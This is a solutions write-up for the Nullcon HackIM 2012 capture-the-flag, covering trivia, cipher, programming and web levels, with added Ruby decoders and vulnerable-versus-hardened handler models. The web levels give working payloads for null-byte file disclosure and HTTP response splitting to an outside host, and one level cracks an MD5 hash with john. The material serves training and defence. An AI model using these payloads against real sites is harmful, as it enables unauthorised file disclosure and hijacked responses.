Nullcon HackIM 2012 Solutions
Trivia Level 1
This operating system also refers to a 1982 science fiction film, a board game, and a song off the
Prodigy B-Side "What Evil Lurks"
Flag: android
Ref:
Trivia Level 2
This fictional IPv4 packet header field was proposed in RFC 3514 as a means for identifying packets
with malicious intent.
Flag: evil bit
Reference: http://www.ietf.org/rfc/rfc3514.txt
Trivia Level 3
This humorous RFC of the Internet Engineering Task Force describes a communication and control
protocol suite designed for allowing infinite numbers of monkeys with infinite numbers of
typewriters to produce the entire works of William Shakespeare.
Flag: 2795
Reference: http://www.ietf.org/rfc/rfc2795.txt
Trivia Level 4
Metasploit was originally coded for what purpose?
Flag: game
Reference: http://threatpost.com/en_us/blogs/qa-hd-moore-metasploit-disclosure-and-ethics-052010
Trivia Level 5
Released on April 1st 2003, this esoteric programming language uses spaces, tabs and linefeeds to
compose commands.
Flag: whitespace
Reference: http://en.wikipedia.org/wiki/Whitespace_(programming_language)
Crypto Level 1: Ulta Pulta
Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx
iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa
Glyik
Clue: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->
Approach: The hint "Recycled Keyboard" pointed to a substitution cipher. Solved it by starting from the crib yfi = the.
Flag: Windows 2000 already contains features such as the human discipline component, where the
PC can send an electric shock through the keyboard if the human does something that does not
please Windows, - Bill Gates
Other methods:
1. http://www.blisstonia.com/software/WebDecrypto/index.php
2. Reversed Keyboard
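The "Reversed Keyboard" method above, written out as an added example (this is not code from the original writeup). The assumption it makes is that "recycled keyboard" means every row of a US keyboard is mirrored (q<->p, w<->o, ..., a<->l, ..., z<->m, and 2<->-, 0<->3 on the number row), which the crib yfi = the confirms; the ciphertext is the one quoted above with the extraction line breaks joined.

```ruby
# Added example: decode the Crypto Level 1 "recycled keyboard" substitution.
# Assumption: each keyboard row is mirrored; the number row includes '-' and '='
# so that digits map too ("2000" <-> "-333").

# Constructed from the ciphertext quoted in the writeup (line breaks joined).
CIPHERTEXT = "Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx " \
             "jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs " \
             "yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy " \
             "qailki Oexjwok, 2 Ceaa Glyik"

KEYBOARD_ROWS = ["1234567890-=", "qwertyuiop", "asdfghjkl", "zxcvbnm"].freeze

# Build the substitution table: each key maps to the key mirrored within its row.
# Mirroring is its own inverse, so one table both encodes and decodes.
def reversed_keyboard_table
  table = {}
  KEYBOARD_ROWS.each do |row|
    row.chars.zip(row.reverse.chars).each { |from, to| table[from] = to }
  end
  table
end

# Apply the table, preserving case and passing unknown characters through.
def decode_reversed_keyboard(text, table = reversed_keyboard_table)
  text.each_char.map do |ch|
    lower = ch.downcase
    next ch unless table.key?(lower)
    ch == lower ? table[lower] : table[lower].upcase
  end.join
end

# Crib check: does the table turn the cipher word into the expected plain word?
def crib_holds?(cipher_word, plain_word, table = reversed_keyboard_table)
  decode_reversed_keyboard(cipher_word, table) == plain_word
end

if __FILE__ == $PROGRAM_NAME
  puts "crib yfi -> the holds: #{crib_holds?('yfi', 'the')}"
  puts decode_reversed_keyboard(CIPHERTEXT)
end
```

Checking the crib first is the cheap way to confirm a hypothesised mapping before decoding the whole text; because the table is an involution, applying the function twice returns the ciphertext, which is a useful sanity check on the table itself.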
Crypto Level 2: White Noise
File: http://www.nullcon.net/challenge/data/shhhkoinahihai
Approach: Initially thought it was whitespace code. Then noticed only tabs and spaces. Wrote code
to convert them to 0 and 1.
Ruby code:
[clevel2]$ cat decode.rb
x = gets
l = x.size
i = 0
decoded = ""
# A space becomes a 1 bit, a tab (or anything else) a 0 bit
while i < l do
  case x[i]
  when ' '
    print "1"
    decoded = decoded + "1"
  else
    print "0"
    decoded = decoded + "0"
  end
  i = i + 1
end
print "\n"
# Regroup the bit string into bytes and print them as characters
# (the loop bound must include the final byte, otherwise the last character is lost)
i = 0
while i + 8 <= decoded.size
  j = i + 7
  print decoded[i..j].to_i(2).chr
  i = i + 8
end
print "\n"
[clevel2]$ cat shhhkoinahihai | ruby decode.rb
01000101011100100111001001101111011100100010000001001101011001010111001101110011
01100001011001110110010100111010001000000101100101101111011101010111001000100000
10100000110000101110011011100110111011101101111011100100110010000100000010011010
11101010111001101110100001000000100001001100101001000000110000101110100001000000
10011000110010101100001011100110111010000100000001100010011100000110111001101110
11000000100000010000110110100001100001011100100110000101100011011101000110010101
11001001110011001000000110000101101110011001000010000001000011011000010110111000
11011110111010000100000010100100110010101110000011001010110000101110100001000000
00001011011100111100100100000011011110110011000100000010110010110111101110101010
00111001001100101011101100110100101101111011101010111001100100000001100110011000
01101100011100000111001001000000101000001100001011100110111001101110111011011110
10001110011001000000010110100100000010011010101001100100000010010110100001000100
001100100011011100110110001100110011000000110100
Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your
Previous 30689 Passwords - MS KB 27630
Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of
Your Previous 30689 Passwords - MS KB 276304
Crypto Level 3: Base Test
Clue:
====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====
Approach: Looked like Base64. Tried Base64 and Base32 decoding. The padding in front suggested that we may need to reverse the string.
Ruby code:
def decodeb32(string)
  hash = {
    "A" => "00000",
    "B" => "00001",
    "C" => "00010",
    "D" => "00011",
    "E" => "00100",
    "F" => "00101",
    "G" => "00110",
    "H" => "00111",
    "I" => "01000",
    "J" => "01001",
    "K" => "01010",
    "L" => "01011",
    "M" => "01100",
    "N" => "01101",
    "O" => "01110",
    "P" => "01111",
    "Q" => "10000",
    "R" => "10001",
    "S" => "10010",
    "T" => "10011",
    "U" => "10100",
    "V" => "10101",
    "W" => "10110",
    "X" => "10111",
    "Y" => "11000",
    "Z" => "11001",
    "2" => "11010",
    "3" => "11011",
    "4" => "11100",
    "5" => "11101",
    "6" => "11110",
    "7" => "11111",
    "=" => "0"      # padding contributes a single 0 bit; the offset loop below absorbs it
  }
  decoded = ""
  len = string.size - 1
  (0..len).each do |i|
    print hash[string[i].chr]
    decoded = decoded + hash[string[i].chr]
  end
  print "\n"
  b32 = ""
  # Try all 8 bit alignments, since the leading "====" shifts the real data
  (0..7).each do |s|
    i = s
    while i + 8 <= decoded.size
      j = i + 7
      print decoded[i..j].to_i(2).chr
      b32 = b32 + decoded[i..j].to_i(2).chr
      i = i + 8
    end
    print "\n"
  end
  return b32
end
string = "====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="
decodeb32(string)
decodeb32(string.reverse)
string = "MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======"
decodeb32(string)
Flag: duoTriGeSimalandNgiti
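The same two-layer decode done with a plain RFC 4648 Base32 decoder, as an added example that is not the writeup's own code. It assumes the "====" at both ends of the clue are decoration to be stripped, reverses the string first (the writeup's observation), and keeps peeling layers while the output is printable; the clue string is the one quoted above.

```ruby
# Added example: RFC 4648 Base32 decoding applied to the Crypto Level 3 clue.
BASE32_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"

# Constructed from the clue quoted in the writeup.
CLUE = "====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="

# Decode Base32 text. Padding and characters outside the alphabet are ignored and
# only whole bytes are emitted, so a trailing partial group is dropped as the RFC
# requires. Returns nil when the text contains no alphabet characters at all.
def base32_decode(text)
  symbols = text.upcase.chars.select { |c| BASE32_ALPHABET.include?(c) }
  return nil if symbols.empty?
  bits = symbols.map { |c| BASE32_ALPHABET.index(c).to_s(2).rjust(5, "0") }.join
  bits[0, bits.size - bits.size % 8].scan(/.{8}/).map { |b| b.to_i(2) }.pack("C*")
end

# Is every byte printable ASCII? Used to tell a successful layer from garbage.
def printable?(bytes)
  bytes.each_byte.all? { |b| b.between?(0x20, 0x7e) }
end

# Peel layers: try the string as given and reversed, keep whichever decodes to
# printable text, and repeat until neither orientation yields printable output.
def peel_base32_layers(text, max_layers = 5)
  layers = []
  current = text
  max_layers.times do
    candidates = [current, current.reverse].map { |c| base32_decode(c) }.compact
    plain = candidates.find { |c| !c.empty? && printable?(c) }
    break if plain.nil?
    layers << plain
    current = plain
  end
  layers
end

if __FILE__ == $PROGRAM_NAME
  peel_base32_layers(CLUE).each_with_index { |layer, i| puts "layer #{i + 1}: #{layer}" }
end
```

The first layer of the reversed clue is itself Base32 (it ends in the six "=" of a proper final group), which is why the writeup had to run its decoder a second time; the printable-output heuristic is what lets the loop stop after the real flag rather than decoding it a third time.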
Crypto Level 4: Elucidate
File: http://www.nullcon.net/challenge/data/elucidate
"\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156
\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157
\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165
\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151
\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143
\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"; return
file_exists($_0cd4cee5d8ae33bea2a09fe4d5698e7a); } else { return false; } }
$_37c4dfe05770cbe4a45d2ae9fa96a647=array("\x66\151\x6c\145\x31\56\x6a\160\x67",
"\x66\151\x6c\145\x32\56\x6a\160\x67", "\x66\151\x6c\145\x33\56\x67\151\x66");
create_zip($_37c4dfe05770cbe4a45d2ae9fa96a647,
"\x6d\171\x7a\151\x70\146\x69\154\x65\56\x7a\151\x70", true); ?>
From above we get the flag:
ruby-1.9.2-p180 :001 > "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156
\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164
\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145
\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154
\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143
\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163
\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
 => "onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena"
ruby-1.9.2-p180 :002 >
References: http://www.tareeinternet.com/scripts/decrypt.php
Flag:
onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena
Crypto Level5: Llun Saving Bank
Llun Saving Bank is fed up with known encryption standards to store the data. They decided to
reinvent the wheel. Can you decode the data?
Clue: Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd
Approach: Initially was totally lost. Then noticed that by substituting some of the letters by their
previous or next alphabet, we can get some meaningful text as follows:
“Is God willing to prevent evil,but not able? Then he is NOT Omnipotent. Is He able, but NOT willing? Then He is Malevolent. Is He Both able and Willing? Then Whence Cometh Evil? Is he Neither able Nor Willing? Then WHY call him GOD? – Epicurusongod”
Each altered letter is one bit away from the original, which points to steganography. Printing out the binary of both strings showed that only the least significant bit differs for certain letters, the standard LSB form of steganography usually seen in audio files. A script then recovered the hidden message.
Ruby Code:
crypted = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU " \
          "Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth " \
          "@bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor " \
          "Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"
orig = "Is God willing to prevent evil,but not able? Then he is NOT " \
       "Omnipotent. Is He able, but NOT willing? Then He is Malevolent. Is He Both " \
       "able and Willing? Then Whence Cometh Evil? Is he Neither able Nor Willing? " \
       "Then WHY call him GOD? - Epicurusongod"
len = crypted.size
binmsg = ""
(0..(len - 1)).each do |i|
  # Show both bit patterns side by side; only bit 0 differs where a letter changed
  print "Crypted : " + crypted[i].unpack("B*").first + "\n"
  print "Original: " + orig[i].unpack("B*").first + "\n"
  # The hidden bit is the least significant bit of each crypted character
  binmsg = binmsg + crypted[i].unpack("B*").first[7]
end
print "Binary message: " + binmsg + "\n"
print "Text message: " + [binmsg].pack("B*")
print "\n"
Flag: Learn howto Hide in Plain Sight
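The scheme in both directions, as an added example that is not part of the writeup: embed_lsb hides a message in the low bit of successive cover characters (which is why every altered letter ends up one bit away from the original), extract_lsb recovers it, and lsb_only_differences? is the check the writeup made by eye on the two bit dumps. The cover sentence is constructed; the crypted and original texts are the ones quoted above, with line breaks joined; the NUL terminator is this example's own convention.

```ruby
# Added example: LSB steganography in text (Crypto Level 5), encode and decode.

# Constructed cover text; it needs 8 characters per hidden byte plus a terminator.
COVER = "The quick brown fox jumps over the lazy dog while the cat sleeps on the mat, " \
        "and the owl watches the moon rise above the quiet river bank tonight."

# The clue and its readable counterpart, as quoted in the writeup.
CRYPTED = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- " \
          "cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui " \
          "Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"
ORIG = "Is God willing to prevent evil,but not able? Then he is NOT Omnipotent. Is He able, " \
       "but NOT willing? Then He is Malevolent. Is He Both able and Willing? Then Whence Cometh " \
       "Evil? Is he Neither able Nor Willing? Then WHY call him GOD? - Epicurusongod"

# Hide message (plus a NUL terminator) in the least significant bit of successive bytes.
def embed_lsb(cover, message)
  bits = (message + "\0").unpack1("B*")
  raise ArgumentError, "cover too short for message" if bits.size > cover.bytesize
  cover.each_byte.with_index.map { |b, i| i < bits.size ? (b & 0xFE) | bits[i].to_i : b }.pack("C*")
end

# Read the low bit of every byte, 8 per character, stopping at the NUL terminator
# (or at the end of the text when there is none, as with the challenge clue).
def extract_lsb(stego)
  bits = stego.each_byte.map { |b| (b & 1).to_s }.join
  bytes = bits.scan(/.{8}/).map { |s| s.to_i(2) }
  nul = bytes.index(0)
  (nul ? bytes[0, nul] : bytes).pack("C*")
end

# True when the texts have the same length and differ only in bit 0 of some bytes,
# the signature the writeup spotted in the side-by-side bit dumps.
def lsb_only_differences?(a, b)
  return false unless a.bytesize == b.bytesize
  a.each_byte.zip(b.each_byte).all? { |x, y| (x ^ y) <= 1 }
end

if __FILE__ == $PROGRAM_NAME
  stego = embed_lsb(COVER, "Hi there")
  puts "cover and stego differ only in LSBs: #{lsb_only_differences?(COVER, stego)}"
  puts "recovered: #{extract_lsb(stego)}"
  puts "from the challenge clue: #{extract_lsb(CRYPTED)}"
end
```

Text carriers are a poor hiding place compared with audio or images because a one-bit change turns a letter into a visibly wrong one, which is exactly what made the clue look like a substitution cipher at first.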
Programming Level 1: ROTOMATA
Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit
Clue: We only know the first 6 characters: "Men at"
Approach: From manual inspection, we found that the i-th character of the ciphertext appears to differ from the plaintext by i mod 26. By manually decoding some words and searching Google, got the flag.
Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings
Programming Level 2: Pascal’s Triangle
The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
Approach: In Pascal's triangle, the sum of the squares of the entries of row n equals the middle entry of row (2n − 1), rows being counted from 1.
Ruby Code:
#rows = gets
rows = 1337
rows = rows.to_i / 2
a = Array.new
total = 0
# Build rows 0..rows of the triangle; the sum of squares of row i is the middle
# term of row 2i, so this adds up the middle terms of the first 1337 rows
(0..rows).each do |i|
  a[i] = Array.new
  (0..i).each do |j|
    a[i][j] = 1 if j == 0 || i == j
    a[i][j] = a[i - 1][j - 1] + a[i - 1][j] unless j == 0 || i == j
    total = total + a[i][j] * a[i][j]
  end
end
print total
print "\n"
Flag:
43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497
Programming Level 3: Your Brainfuck Sir...
Debug bfcode to get the flag
File: http://www.nullcon.net/challenge/data/bfcode
Approach: Used online BF interpreter and debugger. Adding . at the end of every line gave the
required flag as output.
Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..
Programming Level 4: Substitute Problem
File: http://www.nullcon.net/challenge/data/deobfus
Ruby Code:
def trans1(x)
out = ""
cipher = " ABCDEFGHIJKLMNOPQRSTUVWXYZ...0123456789"
words = x.split(' ')
words.each do |w|
out = out + cipher[w.to_i]
end
return out
end
def trans2(x)
out = ""
# FOUTEEN and EIGTEEN are spelled the way the challenge data spells them
map = { "ZERO" => "00", "ONE" => "01", "TWO" => "02", "THREE" => "03", "FOUR" => "04",
        "FIVE" => "05", "SIX" => "06", "SEVEN" => "07", "EIGHT" => "08", "NINE" => "09",
        "TEN" => "10", "ELEVEN" => "11", "TWELVE" => "12", "THIRTEEN" => "13",
        "FOUTEEN" => "14", "FIFTEEN" => "15", "SIXTEEN" => "16", "SEVENTEEN" => "17",
        "EIGTEEN" => "18", "NINETEEN" => "19", "TWENTY" => "20", "TWENTYONE" => "21",
        "TWENTYTWO" => "22", "TWENTYTHREE" => "23", "TWENTYFOUR" => "24", "TWENTYFIVE" => "25",
        "TWENTYSIX" => "26", "THIRTYEIGHT" => "38", "THIRTYFOUR" => "34"
}
words = x.split(' ')
words.each do |w|
print "Invalid " + w if map[w].nil?
out = out + map[w].to_s + " "
end
return out
end
input = gets
# Alternate the two transforms until the text reads as English
out = trans1(input)
print out.downcase + "\n"
out = trans2(out)
print out.downcase + "\n"
out = trans1(out)
print out.downcase + "\n"
out = trans2(out)
print out.downcase + "\n"
out = trans1(out)
print out.downcase + "\n"
#out = trans1(trans2(trans1(trans2(trans1(input)))))
#print out.downcase + "\n"
[plevel4]$ cat deobfus | ruby deof.rb
fouteen nine fouteen five twenty five five fouteen zero six nine twentytwo five
zero six fifteen twentyone eigteen zero twenty twentythree five fouteen twenty t
wentyfive fifteen fouteen five zero twenty twentythree five twelve twentytwo fiv
e zero six nine six twenty five five fouteen zero twenty twentythree five foutee
n twenty twentyfive fifteen fouteen five zero fouteen nine fouteen five twenty f
ive five fouteen zero twenty twentythree five twelve twentytwo five zero twenty
twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysi
x five eigteen fifteen zero six nine twentytwo five zero fouteen nine fouteen fi
ve twenty five five fouteen zero twenty eight eigteen five five zero five nine s
even eight twenty zero six nine twentytwo five zero twenty twentythree five fout
een twenty twentyfive twenty eight eigteen five five zero twentysix five eigteen
fifteen zero six nine six twenty five five fouteen zero twenty twentythree fift
een zero nineteen nine twentyfour zero twenty twentythree five fouteen twenty tw
entyfive fifteen fouteen five zero fouteen nine fouteen five twenty five five fo
uteen zero twenty eight eigteen five five zero fifteen fouteen five zero twenty
twentythree five fouteen twenty twentyfive zero six nine six twenty five five fo
uteen zero five nine seven twenty five five fouteen zero twenty twentythree five
fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen f
ifteen zero five nine seven eight twenty zero twenty twentythree five fouteen tw
enty twentyfive six nine twentytwo five zero nineteen nine twentyfour twenty fiv
e five fouteen zero six nine twentytwo five zero five nine seven twenty five fiv
e fouteen zero twenty twentythree five fouteen twenty twentyfive twenty twentyth
ree fifteen zero six nine twentytwo five zero five nine seven twenty five five f
outeen zero twenty twentythree fifteen zero six nine six twenty five five foutee
n zero fouteen nine fouteen five twenty five five fouteen zero fouteen nine fout
een five zero twenty twentythree five fouteen twenty twentyfive zero twenty twen
tythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix fi
ve eigteen fifteen zero fifteen fouteen five zero six fifteen twentyone twenty f
ive five fouteen zero six fifteen twentyone eigteen zero twentysix five eigteen
fifteen zero nineteen nine twentyfour twenty five five fouteen zero five nine se
ven twenty five five fouteen zero six nine six twenty five five fouteen zero twe
nty twentythree five twelve twentytwo five zero fouteen nine fouteen five zero t
wenty twentythree five fouteen twenty twentyfive six fifteen twentyone eigteen z
ero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twenty
five zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo f
ive zero twentysix five eigteen fifteen zero twenty eight nine eigteen twenty tw
entyfive five nine seven eight twenty zero twenty eight nine eigteen twenty twen
tyfive six fifteen twentyone eigteen zero twentysix five eigteen fifteen zero fi
ve nine seven twenty five five fouteen zero six nine six twenty five five foutee
n zero six nine twentytwo five zero six fifteen twentyone eigteen zero twenty tw
entythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix
five eigteen fifteen zero nineteen five twentytwo five fouteen zero five nine se
ven twenty five five fouteen zero six nine twentytwo five zero six nine twentytw
o five zero six fifteen twentyone twenty five five fouteen
14 09 14 05 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 20 23 05 14 20 25 15 14
05 00 20 23 05 12 22 05 00 06 09 06 20 05 05 14 00 20 23 05 14 20 25 15 14 05 0
0 14 09 14 05 20 05 05 14 00 20 23 05 12 22 05 00 20 23 05 14 20 25 06 09 22 05
00 26 05 18 15 00 06 09 22 05 00 14 09 14 05 20 05 05 14 00 20 08 18 05 05 00 05
09 07 08 20 00 06 09 22 05 00 20 23 05 14 20 25 20 08 18 05 05 00 26 05 18 15 0
0 06 09 06 20 05 05 14 00 20 23 15 00 19 09 24 00 20 23 05 14 20 25 15 14 05 00
14 09 14 05 20 05 05 14 00 20 08 18 05 05 00 15 14 05 00 20 23 05 14 20 25 00 06
09 06 20 05 05 14 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 06 09 22 05 00 2
6 05 18 15 00 05 09 07 08 20 00 20 23 05 14 20 25 06 09 22 05 00 19 09 24 20 05
05 14 00 06 09 22 05 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 20 23 15 00 06
09 22 05 00 05 09 07 20 05 05 14 00 20 23 15 00 06 09 06 20 05 05 14 00 14 09 1
4 05 20 05 05 14 00 14 09 14 05 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 09
22 05 00 26 05 18 15 00 15 14 05 00 06 15 21 20 05 05 14 00 06 15 21 18 00 26 05
18 15 00 19 09 24 20 05 05 14 00 05 09 07 20 05 05 14 00 06 09 06 20 05 05 14 0
0 20 23 05 12 22 05 00 14 09 14 05 00 20 23 05 14 20 25 06 15 21 18 00 14 09 14
05 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 20 08
09 18 20 25 05 09 07 08 20 00 20 08 09 18 20 25 06 15 21 18 00 26 05 18 15 00 0
5 09 07 20 05 05 14 00 06 09 06 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 20
23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 19 05 22 05 14 00 05 09 07 20 05 05
14 00 06 09 22 05 00 06 09 22 05 00 06 15 21 20 05 05 14
nineteen five four twentyone twelve fifteen twentyone nineteen twelve twentyfive
zero five nineteen three eight five twentythree zero fifteen two six twentyone
nineteen three one twenty fifteen eigteen twentyfive zero eight twentyfive sixte
en five eigteen twentytwo five eigteen two fifteen nineteen nine twenty twentyfi
ve zero one fouteen four zero sixteen eigteen fifteen twelve nine twentyfour nin
e twenty twentyfive zero thirtyeight thirtyfour zero eigteen fifteen five four t
wentyfive zero seven eigteen five five fouteen
19 05 04 21 12 15 21 19 12 25 00 05 19 03 08 05 23 00 15 02 06 21 19 03 01 20 15
18 25 00 08 25 16 05 18 22 05 18 02 15 19 09 20 25 00 01 14 04 00 16 18 15 12 0
9 24 09 20 25 00 38 34 00 18 15 05 04 25 00 07 18 05 05 14
sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green
Programming Level 5: A pinch of salt for your coffee, Sir?
URL: http://www.nullcon.net/challenge/plevel-5-salt.asp
Clue: password + salt = md5 hash
Approach: Obtained md5 hash for password = ‘a’ as 5e33d53d1a9511b8ddccc3c1aed830de
Created pass.txt with the following content:
a: 5e33d53d1a9511b8ddccc3c1aed830de
Bruteforced using john (version 1.7.9-jumbo) in incremental mode.
john -i --format=raw-md5 pass.txt
Loaded 1 password hash (Raw MD5 [SSE2i 10x4x3])
a399a7d (a)
Password cracked : a399a7d
Flag: 399a7d
Web Level 1:
Can you view the bytes in password.asp from Me?
URL: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=test.txt
Tools Used: Google Chrome
Approach: (null byte termination file disclosure vulnerability)
1. Right click on link Me and select Inspect Element
2. Edit attribute href from “wlevel-1-proc.asp?input=test.txt” to “wlevel-1-proc.asp?input=password.asp%00.txt”
3. Click on Me
Flag: password.asp%00.txt
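The bug class behind this level, modelled in Ruby as an added example (the challenge's ASP source is not shown, so this is not the level's code): a handler that appends ".txt" to user input, as the input=test.txt URL suggests it does, next to the checks that close the %00 truncation hole. The base directory and the two sample files are constructed in a temporary directory.

```ruby
# Added example: NUL-byte truncation in a file-serving handler, vulnerable vs hardened.
require "tmpdir"

# Vulnerable model: the server appends ".txt" and hands the path to a C-string
# based file API, which stops at the first NUL byte, so "password.asp\0.txt"
# opens password.asp. The truncation is modelled explicitly here.
def effective_path_naive(base_dir, input)
  name = input + ".txt"
  name = name[0, name.index("\0")] if name.include?("\0")
  File.join(base_dir, name)
end

# Hardened version: reject NUL bytes, separators and parent references outright,
# allow only a conservative character set, and verify that the resolved path is
# still inside base_dir after expansion.
def resolve_txt_path(base_dir, input)
  raise ArgumentError, "NUL byte in filename" if input.include?("\0")
  raise ArgumentError, "path separators not allowed" if input.match?(%r{[/\\]}) || input.include?("..")
  raise ArgumentError, "unexpected characters in filename" unless input.match?(/\A[\w.-]+\z/)
  full = File.expand_path(input + ".txt", base_dir)
  root = File.expand_path(base_dir) + File::SEPARATOR
  raise ArgumentError, "escapes base directory" unless full.start_with?(root)
  full
end

# Run both handlers against the same input and return what each one produced.
def serve_demo(input = "password.asp\0")
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, "test.txt"), "public")
    File.write(File.join(dir, "password.asp"), "<% pw = 'secret' %>")   # constructed secret
    naive = File.read(effective_path_naive(dir, input))
    hardened = begin
      File.read(resolve_txt_path(dir, input))
    rescue ArgumentError => e
      "rejected: #{e.message}"
    end
    [naive, hardened]
  end
end

if __FILE__ == $PROGRAM_NAME
  naive, hardened = serve_demo
  puts "naive handler returned:    #{naive}"
  puts "hardened handler returned: #{hardened}"
end
```

Rejecting the NUL byte is necessary but not sufficient on its own; the extension check and the base-directory check are what stop the same handler from being used for plain traversal once the %00 trick is closed.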
Web Level 2:
Can you redirect ME to hackim.null.co.in?
Tools Used: Google Chrome
Approach: HTTP Response Splitting
Steps:
1. Right click on link ME and select Inspect Element
2. Edit attribute href from “wlevel-2-proc.asp?page=index.asp” to "wlevel-2-proc.asp?page=wlevel-2-proc.asp?page=index.asp%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20302%20OK%0d%0aLocation:%20hackim.null.co.in"
3. Click on ME
References: http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting
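Why the payload works and what stops it, as an added Ruby model (the level's server code is not shown, so this is not its implementation): a redirect handler that copies the page parameter into a Location header, first in the splitting-prone form and then with the validation that blocks CR/LF injection. The page value fed to it is the writeup's payload, URL-decoded the way the server would see it; the allow-list of pages is an assumption.

```ruby
# Added example: HTTP response splitting through a redirect, vulnerable vs hardened.
require "uri"

# Naive handler: the user value is pasted straight into the header. A CRLF in it
# ends the header, and the bytes after the blank line are parsed by the client as a
# second, attacker-controlled response.
def naive_redirect(page)
  "HTTP/1.1 302 Found\r\nLocation: #{page}\r\nContent-Length: 0\r\n\r\n"
end

# How many responses a client would parse out of the raw bytes.
def count_responses(raw)
  raw.scan(/^HTTP\/1\.\d \d{3}/).size
end

# Hardened handler: refuse any control character in the value and only redirect
# to known local pages, which rules out header injection and open redirects.
ALLOWED_PAGES = %w[index.asp about.asp].freeze   # assumed allow-list

def safe_redirect(page)
  raise ArgumentError, "control characters in redirect target" if page.match?(/[\x00-\x1f\x7f]/)
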